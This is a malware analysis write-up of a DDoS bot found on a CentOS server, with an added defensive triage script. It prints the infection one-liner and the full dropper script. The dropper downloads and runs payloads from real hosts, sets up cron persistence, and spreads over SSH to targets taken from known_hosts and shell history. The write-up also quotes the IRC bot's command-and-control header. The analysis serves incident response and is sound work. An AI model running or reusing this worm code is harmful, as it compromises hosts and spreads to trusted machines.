DDoS bot ("zombie") code

Recently a CentOS server I run was planted with a trojan by an unknown party. Watching it showed that the trojan is a bot (a "zombie" used to launch DDoS attacks), and while an attack is running it eats most of the host's network bandwidth.

Starting point (the one-liner that was executed on the host):

wget http://65.254.63.20/a|sh ; curl -O http://65.254.63.20/a ; sh a;rm -rf a*

Once that line has run, the machine is compromised. Note that the first fragment, wget http://65.254.63.20/a|sh, pipes nothing useful into sh: wget saves the download to a file named a and writes only its progress output, on stderr. That is why the line immediately re-downloads the same file with curl -O and then runs sh a explicitly, so the script is executed as long as either downloader worked; the trailing rm -rf a* removes the file afterwards. The downloaded file a is the following shell script, reproduced as fetched:

plm=`ps x |grep httpd.conf|grep -v grep`
plt=`cat /proc/cpuinfo|grep aes`
#pgrep perl |sed '1d;' |xargs kill -9
if [ "$plm" != "" ]
  then
    echo
else

    rm -rf  apache* httpd.conf* /usr/local/bin/sysmonitord
    echo 'nameserver 8.8.8.8'> /etc/resolv.conf
    #/sbin/iptables -A OUTPUT -p tcp --dport 45560 -j ACCEPT
    kill -9 `ps x|grep stratum|awk '{print $1}'`
    kill -9 `ps x|grep httpd.conf|grep -v grep|awk '{print $1}'`
    #killall -9 sysmonitord sh wget curl
    crontab -r

    if [ -f libcurl.so.4 ] ; then
        echo
    else
        wget           223.255.145.158/libcrypto.so.6 > /dev/null 2>&1
        wget           223.255.145.158/libcurl.so.4 > /dev/null 2>&1
        wget           223.255.145.158/libssl.so.6 > /dev/null 2>&1
        wget           223.255.145.158/libldap-2.3.so.0 > /dev/null 2>&1
        wget           223.255.145.158/liblber-2.3.so.0 > /dev/null 2>&1

        curl -O http://223.255.145.158/libcrypto.so.6 > /dev/null 2>&1
        curl -O http://223.255.145.158/libssl.so.6 > /dev/null 2>&1
        curl -O http://223.255.145.158/libcurl.so.4 > /dev/null 2>&1
        curl -O http://223.255.145.158/libldap-2.3.so.0 > /dev/null 2>&1
        curl -O http://223.255.145.158/liblber-2.3.so.0 > /dev/null 2>&1
        export LD_LIBRARY_PATH=`pwd`
    fi

    curl -O    http://65.254.63.20/apache > /dev/null 2>&1
    wget -qO - http://65.254.63.20/.mail | perl
    curl -O    http://65.254.63.20/.mail  > /dev/null 2>&1
    fetch      http://65.254.63.20/.mail > /dev/null 2>&1 ; perl .mail ; rm -rf .mail* 
    wget       http://65.254.63.20/apache > /dev/null 2>&1
    wget       http://65.254.63.20/httpd.conf > /dev/null 2>&1
    curl -O    http://65.254.63.20/httpd.conf > /dev/null 2>&1

    if [ -f /etc/cron.daily/anacron ] ; then
        echo
    else
        wget -O /etc/cron.daily/anacron http://65.254.63.20/a > /dev/null 2>&1 ; chmod +x /etc/cron.daily/anacron
        curl -O http://65.254.63.20/a  > /dev/null 2>&1; mv a /etc/cron.daily/anacron ; chmod +x /etc/cron.daily/anacron
    fi

    chmod +x apache
    (exec ./apache -c httpd.conf &> /dev/null &)
    sleep 2

    rm -rf wget* apache* httpd*
fi

if [ "$plm" != "" ]
  then
    echo
  else

    if [ "$plt" != "" ]
      then
        echo
      else
        wget    http://65.254.63.20/apacheaes > /dev/null 2>&1
        curl -O http://65.254.63.20/apacheaes > /dev/null 2>&1
        wget    http://65.254.63.20/httpd.conf > /dev/null 2>&1
        curl -O http://65.254.63.20/httpd.conf > /dev/null 2>&1
        chmod +x apacheaes
        mv apacheaes apache2
        (exec ./apache2 -c httpd.conf &> /dev/null &)
    fi

fi

if [ -f /tmp/.h ] ; then
    echo
else
cat /root/.ssh/known_hosts|grep -v ,|awk '{print $1}' > /tmp/.h > /dev/null 2>&1
cat /root/.ssh/known_hosts|grep ,|awk -F, '{print $1}' >> /tmp/.h > /dev/null 2>&1
cat /root/.bash_history|grep -o '[0-9]\{1,3\}\.[0-9]\{1,3\}\.[0-9]\{1,3\}\.[0-9]\{1,3\}'|sort -u >> /tmp/.h > /dev/null 2>&1
cat /home/*/.bash_history|grep -o '[0-9]\{1,3\}\.[0-9]\{1,3\}\.[0-9]\{1,3\}\.[0-9]\{1,3\}'|sort -u >> /tmp/.h > /dev/null 2>&1
cat /home/*/.bash_history |grep ssh|awk '{print $2}'|grep -v '-'|grep -v / |sort -u >> /tmp/.h > /dev/null 2>&1
cat /home/*/.bash_history |grep ssh|awk '{print $3}'|grep -v '-'|grep -v / |sort -u >> /tmp/.h > /dev/null 2>&1
cat /root/.bash_history |grep ssh|awk '{print $2}'|grep -v '-'|grep -v /|sort -u >> /tmp/.h > /dev/null 2>&1
cat /root/.bash_history |grep ssh|awk '{print $3}'|grep -v '-'|grep -v /|sort -u >> /tmp/.h > /dev/null 2>&1
for i in `cat /tmp/.h` ; do (exec ssh -oStrictHostKeyChecking=no -oCheckHostIP=no `whoami`@$i "wget http://65.254.63.20/a|sh ; curl -O http://65.254.63.20/a ; sh a;rm -rf a*") > /dev/null 2>&1 ; done
fi

history -rc

What the script does, block by block:

Guard. plm holds any running process whose command line contains httpd.conf, i.e. an already running copy of the bot (it is started as ./apache -c httpd.conf); if one exists the script does nothing else. plt holds the aes flag from /proc/cpuinfo and decides later which extra binary to fetch.

Cleanup of competitors and of the local environment. It deletes old apache*/httpd.conf* files and /usr/local/bin/sysmonitord, kills anything with stratum in its command line (the mining-pool protocol, so rival cryptominers), kills older instances of itself, overwrites /etc/resolv.conf with a lone nameserver 8.8.8.8 so name resolution no longer depends on the local resolver, and runs crontab -r, which wipes root's crontab together with whatever the administrator had scheduled there.

Runtime libraries. If libcurl.so.4 is not in the working directory it pulls libcrypto.so.6, libssl.so.6, libcurl.so.4, libldap-2.3.so.0 and liblber-2.3.so.0 from 223.255.145.158 and points LD_LIBRARY_PATH at the current directory, so the prebuilt bot binary runs on hosts that lack those soname versions. Every download is attempted with both wget and curl (and with fetch, the FreeBSD downloader) so that at least one succeeds.

Payloads. From 65.254.63.20 it fetches apache (the DDoS bot, named after the web server so it blends into the process list), httpd.conf (its configuration) and .mail, a Perl IRC bot that is piped straight into perl. On CPUs whose cpuinfo has no aes flag it additionally fetches apacheaes and starts it as apache2; the most plausible reading is that the first binary depends on AES-NI instructions and this is the fallback build, but that is an inference from the names, not something the script states.

Persistence. If /etc/cron.daily/anacron does not exist, a copy of this very script is written there and made executable, so run-parts re-runs it every day. On stock CentOS the packaged hook is /etc/cron.daily/0anacron; a file literally named anacron in that directory is therefore a good indicator on its own.

Launch and anti-forensics. ./apache -c httpd.conf is started detached, and two seconds later wget*, apache* and httpd* are deleted. The bot keeps running from the unlinked inode: /proc/<pid>/exe then reads ".../apache (deleted)", and cp /proc/<pid>/exe <file> is the simplest way to recover the sample. The support libraries, on the other hand, are never cleaned up and stay on disk.

Lateral movement. Unless /tmp/.h already exists (so this part runs once per host), it builds a target list from the first field of every line in /root/.ssh/known_hosts (handling both the host and the ip,host forms), every dotted-quad IPv4 address in root's and every home user's .bash_history, and the second and third word of any history line containing ssh, minus words containing - or /. It then runs ssh -oStrictHostKeyChecking=no as the current user to every entry and executes the same one-liner as the starting point. No password is supplied, so this only succeeds where key or agent authentication already works, which is exactly the trust relationship an admin host tends to have. The parsing is crude (the port number after -p, or a hashed known_hosts entry, ends up as a "target"), but /tmp/.h is still the best record of which hosts were attacked from the compromised machine.

Finally, history -rc clears the current shell's command history so the infection commands are not written to .bash_history.

The Perl code that wget -qO - http://65.254.63.20/.mail | perl above downloads and runs, as far as the saved copy goes (it breaks off partway through the CTCP VERSION spoof list). Even the visible header says a lot: the bot connects to an IRC server at 213.152.3.19 on port 8080 (the "Random Ports" list holds only that one), joins #x, accepts commands only from the nick in @mast3rs ("G") and the host in @hostauth, uses !say as its trigger ($xeqt; judging by the name, the execute trigger), has shell access switched on ($shellaccess = 1) together with $pacotes (Portuguese for "packets", presumably its flooding functions), uses "V" as its nick, sends uname -a as its real name, hides in the process list as /usr/bin/httpd (@fakeps), and answers CTCP VERSION requests with entries from @Mrx so that the channel looks like a crowd of ordinary mIRC, XChat and BitchX users:

#!/usr/bin/perl
my @mast3rs = ("G");

my @hostauth = ("localhost");
my @admchan=("#x");

my @server = ("213.152.3.19");
$servidor= $server[rand scalar @server] unless $servidor;

my $xeqt = "!say";
my $homedir = "/tmp";
my $shellaccess = 1;
my $xstats = 1;
my $pacotes = 1;
my $linas_max = 5;
my $sleep = 6;
my $portime = 4;

my @fakeps = ("/usr/bin/httpd");

my @nickname = ("V");

my @xident = ("xxx");
my @xname = (`uname -a`);

#################
# Random Ports
#################
my @rports = ("8080");

my @Mrx = ("\001mIRC32 v5.91 K.Mardam-Bey\001","\001mIRC v6.2 Khaled Mardam-Bey\001",
   "\001mIRC v6.03 Khaled Mardam-Bey\001","\001mIRC v6.14 Khaled Mardam-Bey\001",
   "\001mIRC v6.15 Khaled Mardam-Bey\001","\001mIRC v6.16 Khaled Mardam-Bey\001",
   "\001mIRC v6.17 Khaled Mardam-Bey\001","\001mIRC v6.21 Khaled Mardam-Bey\001",
   "\001Snak for Macintosh 4.9.8 English\001",
   "\001DvC v0.1 PHP-5.1.1 based on Net_SmartIRC\001",
   "\001PIRCH98:WIN 95/98/WIN NT:1.0 (build 1.0.1.1190)\001",
   "\001xchat 2.6.2 Linux 2.6.18.5 [i686/2.67GHz]\001",
   "\001xchat:2.4.3:Linux 2.6.17-1.2142_FC4 [i686/2,00GHz]\001",
   "\001xchat:2.4.3:Linux 2.6.17-1.2142_FC4 [i686/1.70GHz]\001",
   "\001XChat-GNOME IRC Chat 0.16 Linux 2.6.20-8-generic [i686]\001",
   "\001ircN 7.27 + 7.0 - -\001","\001..(argon/1g) :bitchx-1.0c17\001",
   "\001ircN 8.00 ^_-^_ he tries to tell me what I put inside of me ^_-^_\001",
   "\001FreeBSD!4.11-STABLE bitchx-1.0c18 - prevail[0123] :down with people\001",
   "\001BitchX-1.0c19+ by panasync - Linux 2.4.31 : Keep it to yourself!\001",
   "\001BitchX-1.0c19+ by panasync - Linux 2.4.33.3 : Keep it to yourself!\001",
   "\001BitchX-1.1-final+ by panasync - Linux 2.6.18.1 : Keep it to yourself!\001",
   "\001BitchX-1.0c19 by panasync - freebsd 4.10-STABLE : Keep it to yourself!\001",
   "\001BitchX-1.1-final+ by panasync - FreeBSD 4.5-STABLE : Keep it to yourself!\001",
   "\001BitchX-1.1-final+ by panasync - FreeBSD 6.0-RELEASE : Keep it to yourself!\001",
   "\001BitchX-1.1-final+ by panasync - FreeBSD 5.3-RELEASE : Keep it to yourself!\001",
   "\001bitchx-1.0c18 :tunnelvision/1.2\001","\001PnP 4.22 - http://www.pairc.com/\001",
   "\001BitchX-1.0c17/FreeBSD 4.10-RELEASE:(c)rackrock/bX [3.0.1??9] : Keep it to yourself!\001",
   "\001P&P 4.22.2 (in development) + X Z P Bots, Sound, NickServ, ChanServ, Extras\001",
   "\001HydraIRC v0.3.148 (18/Jan/2005) by Dominic Clifton aka Hydra - #HydraIRC on EFNet\001",
   "\001irssi v0.8.10 - running on Linux i586\001","\001irssi v0.8.10
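
A triage helper that turns the dropper and the bot header above into host checks. It is example code written for this write-up, not part of the original post and not the malware's code; all names in it are mine. It assumes a POSIX sh, a grep that supports -o, a procps-style ps, and the paths the dropper itself touches (root's known_hosts, per-user .bash_history, /tmp/.h, /etc/cron.daily), and takes the root to inspect as an argument so it can be pointed at a mounted disk image as well as at the live host. check_iocs reports the artefacts the script leaves behind; harvest_targets re-runs the dropper's own target extraction, so a responder knows which hosts received the ssh push; make_sample_root builds a constructed sample tree (not data from any real host) for trying it offline.

```sh
#!/bin/sh
# Added triage helper for the dropper and the Perl IRC bot analysed above.
# Example code for this write-up, not the original post's and not the malware's.
# Assumptions: POSIX sh, grep with -o, procps-style ps, the paths the dropper
# touches. ROOT is "/" on the live host or the mount point of a disk image
# (live-process checks are skipped in that case). All names here are mine.

# Indicators lifted from the dropper: its two download hosts and the library
# sonames it fetches into its working directory and never deletes.
DROPPER_HOSTS='65\.254\.63\.20|223\.255\.145\.158'
DROPPED_LIBS='libcrypto.so.6 libcurl.so.4 libssl.so.6 libldap-2.3.so.0 liblber-2.3.so.0'

# harvest_targets ROOT
# Re-runs the dropper's own extraction (known_hosts first field, every dotted
# quad in shell history, 2nd/3rd word of any history line containing "ssh",
# minus words with "-" or "/"): the list it writes to /tmp/.h and then pushes
# itself to over ssh. The output is the set of hosts to check next.
harvest_targets() {
    root="$1"
    {
        if [ -r "$root/root/.ssh/known_hosts" ]; then
            awk '{print $1}' "$root/root/.ssh/known_hosts" | cut -d, -f1
        fi
        cat "$root/root/.bash_history" "$root"/home/*/.bash_history 2>/dev/null |
            grep -o '[0-9]\{1,3\}\.[0-9]\{1,3\}\.[0-9]\{1,3\}\.[0-9]\{1,3\}' || true
        cat "$root/root/.bash_history" "$root"/home/*/.bash_history 2>/dev/null |
            grep ssh | awk '{print $2; print $3}' | grep -v -- '-' | grep -v / || true
    } | grep -v '^$' | sort -u
}

# check_iocs ROOT
# Prints one "IOC:" line per artefact found; returns 0 if clean, 1 if not.
check_iocs() {
    root="$1"; hits=0
    # Persistence: a cron.daily job that contacts either download host (the
    # dropper installs itself as /etc/cron.daily/anacron).
    for f in "$root"/etc/cron.daily/*; do
        [ -f "$f" ] || continue
        if grep -Eq "$DROPPER_HOSTS" "$f"; then
            echo "IOC: cron job $f contacts dropper host"; hits=1
        fi
    done
    # Target list the worm writes once and then uses as its "already spread" marker.
    if [ -f "$root/tmp/.h" ]; then
        echo "IOC: $root/tmp/.h present ($(grep -c . "$root/tmp/.h") harvested targets)"; hits=1
    fi
    # resolv.conf reduced to the single line the dropper echoes into it.
    if [ -f "$root/etc/resolv.conf" ] && [ "$(cat "$root/etc/resolv.conf")" = "nameserver 8.8.8.8" ]; then
        echo "IOC: $root/etc/resolv.conf replaced with lone 'nameserver 8.8.8.8'"; hits=1
    fi
    # Support libraries left in the working directory (the final rm only removes
    # wget*, apache* and httpd*).
    for dir in "$root/root" "$root"/home/* "$root/tmp"; do
        for lib in $DROPPED_LIBS; do
            if [ -f "$dir/$lib" ]; then
                echo "IOC: dropped library $dir/$lib"; hits=1
            fi
        done
    done
    # Live-host checks only (meaningless against a mounted image).
    if [ "$root" = "/" ]; then
        # Bot started as ./apache -c httpd.conf, binary unlinked afterwards, so
        # /proc/<pid>/exe reads "... (deleted)" and is also where to copy it from.
        for pid in $(ps -eo pid,args | awk '/apache2? -c httpd\.conf/ && !/awk/ {print $1}'); do
            echo "IOC: bot pid $pid exe=$(readlink /proc/$pid/exe)"; hits=1
        done
        # Perl bot renames itself (@fakeps): a perl binary whose argv no longer says perl.
        ps -eo pid,comm,args | awk '$2 == "perl" && $3 !~ /perl/ {print "IOC: disguised perl pid " $1 " shown as " $3}' | grep . && hits=1
    fi
    return $hits
}

# make_sample_root DIR
# Constructed sample tree (not from any real host) mirroring what the dropper
# reads and leaves behind, so the helper can be exercised offline.
make_sample_root() {
    s="$1"
    mkdir -p "$s/root/.ssh" "$s/home/alice" "$s/etc/cron.daily" "$s/tmp"
    printf 'db1 ssh-rsa AAAA\n10.0.0.5,db2 ssh-rsa BBBB\n' > "$s/root/.ssh/known_hosts"
    printf 'ssh admin@10.0.0.7\nping 192.168.1.9\nssh -p 2222 web1\n' > "$s/root/.bash_history"
    printf 'scp f.txt 10.0.0.8:/tmp\nssh alice@bastion\n' > "$s/home/alice/.bash_history"
    printf 'wget http://65.254.63.20/a|sh\n' > "$s/etc/cron.daily/anacron"
    printf 'nameserver 8.8.8.8\n' > "$s/etc/resolv.conf"
    : > "$s/tmp/.h"
    : > "$s/root/libcurl.so.4"
}

# Usage:  sh triage.sh /              live host
#         sh triage.sh /mnt/evidence  mounted image (live checks skipped)
#         sh triage.sh --demo         run against the constructed sample tree
case "${1:-}" in
    "") ;;
    --demo) tmp=$(mktemp -d); make_sample_root "$tmp"
            check_iocs "$tmp"; harvest_targets "$tmp"; rm -rf "$tmp" ;;
    *) check_iocs "$1"; rc=$?
       echo "--- hosts the worm would have pushed the dropper to from here ---"
       harvest_targets "$1"; exit $rc ;;
esac
```

Run against the sample tree, harvest_targets returns db1 and 10.0.0.5 from known_hosts (db2 is lost behind the comma, exactly as in the dropper), the four addresses from the histories, admin@10.0.0.7 and alice@bastion, and the junk entry 2222 from "ssh -p 2222 web1" while web1 itself is missed; that is the real reach of the worm, not a cleaned-up one, which is what a responder needs when deciding which hosts to examine next. Two defences fall straight out of the harvesting logic: HashKnownHosts yes in ssh_config turns every known_hosts entry into an unusable hash, and an unencrypted key or forwarded agent that lets root hop between servers without a password is precisely what let this thing spread.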